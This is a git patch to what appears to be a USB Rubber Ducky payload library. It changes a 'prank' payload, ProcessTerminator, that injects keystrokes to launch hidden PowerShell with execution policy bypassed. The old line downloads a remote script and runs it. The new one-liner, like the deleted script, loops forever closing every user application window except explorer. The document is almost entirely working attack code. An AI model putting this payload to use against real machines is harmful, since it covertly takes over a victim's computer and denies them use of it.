From f6ed30e2f33b7fb8b6b1e07645270d23396db37d Mon Sep 17 00:00:00 2001 From: dsymbol Date: Fri, 9 Dec 2022 11:25:36 +0200 Subject: [PATCH] one liner --- payloads/library/prank/ProcessTerminator/payload.txt | 3 ++- payloads/library/prank/ProcessTerminator/pt.ps1 | 9 --------- 2 files changed, 2 insertions(+), 10 deletions(-) delete mode 100644 payloads/library/prank/ProcessTerminator/pt.ps1 diff --git a/payloads/library/prank/ProcessTerminator/payload.txt b/payloads/library/prank/ProcessTerminator/payload.txt index 1af9251..de2e691 100644 --- a/payloads/library/prank/ProcessTerminator/payload.txt +++ b/payloads/library/prank/ProcessTerminator/payload.txt @@ -3,7 +3,8 @@ REM Author: dsymbol REM Description: Hidden PowerShell script that tirelessly hunts down user processes and terminates them REM Target: Windows +DELAY 2000 GUI r DELAY 500 -STRING powershell -w h -NoP -Exec Bypass iwr https://raw.githubusercontent.com/hak5/usbrubberducky-payloads/master/payloads/library/prank/ProcessTerminator/pt.ps1 -OutFile $env:TEMP\pt.ps1; & "$env:TEMP\pt.ps1" +STRING powershell -w h -NoP -NonI -Exec Bypass while(1) {$ws=gps|?{$_.MainWindowHandle-ne 0};foreach($w in $ws){if($w.ProcessName-ne'explorer'-and$w.Id-ne$PID){$w.CloseMainWindow()}}sleep -Seconds 1} ENTER \ No newline at end of file diff --git a/payloads/library/prank/ProcessTerminator/pt.ps1 b/payloads/library/prank/ProcessTerminator/pt.ps1 deleted file mode 100644 index 5c5419b..0000000 --- a/payloads/library/prank/ProcessTerminator/pt.ps1 +++ /dev/null @@ -1,9 +0,0 @@ -while (1) { - $ws = Get-Process | Where-Object { $_.MainWindowHandle -ne 0 } - foreach ($w in $ws) { - if ($w.ProcessName -ne 'explorer' -and $w.Id -ne $PID) { - $w.CloseMainWindow() - } - } - Start-Sleep -Seconds 1 -}